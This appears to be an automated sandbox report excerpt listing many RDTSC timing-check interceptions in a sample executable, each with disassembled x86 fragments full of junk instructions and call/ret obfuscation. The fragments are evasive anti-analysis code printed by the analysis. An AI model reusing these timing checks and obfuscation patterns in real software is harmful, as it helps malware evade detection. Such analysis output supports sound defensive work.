                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EC9A4 second address: 5ECA0D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+1245AD0Fh], ebx 0x00000012 and di, 0868h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FB9E5277418h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov di, E282h 0x00000037 mov ebx, dword ptr [ebp+122D2203h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FB9E5277418h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 sub ebx, 1C389EACh 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 pop eax 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ECA0D second address: 5ECA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ED9FE second address: 5EDA08 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EE8A9 second address: 5EE8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EE8AF second address: 5EE8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EE8B3 second address: 5EE955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB9E4B2921Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FB9E4B29218h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add di, E39Ch 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FB9E4B29218h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d je 00007FB9E4B2921Ch 0x00000053 xor dword ptr [ebp+1245A09Eh], esi 0x00000059 push 00000000h 0x0000005b mov edi, 761D5FD5h 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FB9E4B29228h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A0C second address: 5F0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277420h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A20 second address: 5F0A60 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jnc 00007FB9E4B29219h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 mov dword ptr [ebp+122D1E7Fh], edx 0x0000001c pop ebx 0x0000001d push 00000000h 0x0000001f mov edi, ebx 0x00000021 jmp 00007FB9E4B29221h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007FB9E4B29218h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A60 second address: 5F0A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277428h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A7C second address: 5F0AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB9E4B2921Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ECC03 second address: 5ECC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ECC09 second address: 5ECC1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FB9E4B29218h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EFB8B second address: 5EFBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E5277427h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F1B29 second address: 5F1B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FB9E4B2921Ch 0x0000000b popad 0x0000000c push eax 0x0000000d jng 00007FB9E4B2922Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB9E4B2921Fh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F1B53 second address: 5F1BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D222Ah], edi 0x0000000d push 00000000h 0x0000000f sub ebx, dword ptr [ebp+122D29DAh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FB9E5277418h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 sub bl, FFFFFFD4h 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FB9E5277420h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0C07 second address: 5F0C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jp 00007FB9E4B29216h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FB9E4B29218h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 xor di, EE00h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FB9E4B29218h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 mov bh, 6Ah 0x0000005b mov eax, dword ptr [ebp+122D1221h] 0x00000061 mov bh, ch 0x00000063 push FFFFFFFFh 0x00000065 movsx ebx, bx 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b jns 00007FB9E4B29218h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0C88 second address: 5F0C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0C92 second address: 5F0CC8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB9E4B29225h 0x00000015 jmp 00007FB9E4B29220h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 595995 second address: 5959B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9E5277422h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5959B2 second address: 5959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E4B29216h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5959BE second address: 5959C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5959C3 second address: 5959CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F4262 second address: 5F426C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F426C second address: 5F428A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F5384 second address: 5F538A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F538A second address: 5F538F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FDDD4 second address: 5FDDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E527741Bh 0x00000009 pop ebx 0x0000000a jmp 00007FB9E5277420h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FDDF4 second address: 5FDE08 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9E4B29218h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FB9E4B29216h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FDE08 second address: 5FDE25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FB9E527741Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FDE25 second address: 5FDE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FE2B2 second address: 5FE2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FE2BE second address: 5FE2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FE2C4 second address: 5FE2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FE2C8 second address: 5FE329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29228h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FB9E4B29216h 0x00000010 jmp 00007FB9E4B2921Ah 0x00000015 jo 00007FB9E4B29216h 0x0000001b jmp 00007FB9E4B2921Ah 0x00000020 popad 0x00000021 popad 0x00000022 jo 00007FB9E4B2924Ah 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB9E4B29228h 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FE329 second address: 5FE32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FE32D second address: 5FE33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB9E4B2921Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60307F second address: 603084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 603084 second address: 603089 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 603089 second address: 6030A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB9E5277425h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6030A8 second address: 6030D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9E4B2921Ch 0x00000008 jno 00007FB9E4B29216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 je 00007FB9E4B29216h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6032D6 second address: 6032DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6032DA second address: 6032F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FB9E4B29218h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FB9E4B29216h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6032F3 second address: 603312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277421h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 603312 second address: 603319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 603319 second address: 60333F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007FB9E5277416h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 jmp 00007FB9E527741Dh 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jng 00007FB9E5277416h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60343F second address: 603449 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9E4B2921Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 603449 second address: 438963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 4F745BB7h 0x0000000d jno 00007FB9E5277425h 0x00000013 push dword ptr [ebp+122D104Dh] 0x00000019 jmp 00007FB9E5277429h 0x0000001e call dword ptr [ebp+122D1F6Ah] 0x00000024 pushad 0x00000025 pushad 0x00000026 mov cl, 4Ch 0x00000028 sub dword ptr [ebp+122D30A0h], eax 0x0000002e popad 0x0000002f xor eax, eax 0x00000031 add dword ptr [ebp+122D30A0h], edi 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jno 00007FB9E527742Ch 0x00000041 mov dword ptr [ebp+122D290Eh], eax 0x00000047 jmp 00007FB9E5277428h 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007FB9E5277426h 0x00000056 jmp 00007FB9E527741Ch 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f jmp 00007FB9E5277427h 0x00000064 lodsw 0x00000066 pushad 0x00000067 push eax 0x00000068 push edi 0x00000069 pop esi 0x0000006a pop esi 0x0000006b jmp 00007FB9E527741Fh 0x00000070 popad 0x00000071 cld 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D30A0h], edi 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 xor dword ptr [ebp+122D30A0h], esi 0x00000086 push eax 0x00000087 jo 00007FB9E5277420h 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609DA9 second address: 609DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609DAD second address: 609DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609DB3 second address: 609DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007FB9E4B29216h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 608AEC second address: 608B32 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FB9E527742Eh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FB9E5277426h 0x00000017 pop edi 0x00000018 pushad 0x00000019 jmp 00007FB9E5277429h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 608B32 second address: 608B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6090AA second address: 6090B4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6090B4 second address: 6090C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FB9E4B29216h 0x00000009 jnc 00007FB9E4B29216h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609206 second address: 609238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB9E5277423h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jns 00007FB9E527741Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FB9E5277416h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609238 second address: 60923C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60923C second address: 609262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB9E5277416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jg 00007FB9E5277416h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FB9E527741Dh 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609262 second address: 609272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609272 second address: 609276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609692 second address: 6096AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E4B2921Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6096AB second address: 6096AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609C27 second address: 609C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9E4B29216h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609C32 second address: 609C59 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E527741Ch 0x00000008 pushad 0x00000009 jmp 00007FB9E5277426h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 609C59 second address: 609C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60F5FF second address: 60F606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E060 second address: 60E078 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9E4B2921Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E078 second address: 60E07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E07E second address: 60E084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E471 second address: 60E478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E478 second address: 60E480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E480 second address: 60E4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jl 00007FB9E527743Eh 0x0000000d jmp 00007FB9E5277421h 0x00000012 jmp 00007FB9E5277427h 0x00000017 jp 00007FB9E527741Ch 0x0000001d pushad 0x0000001e jmp 00007FB9E527741Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
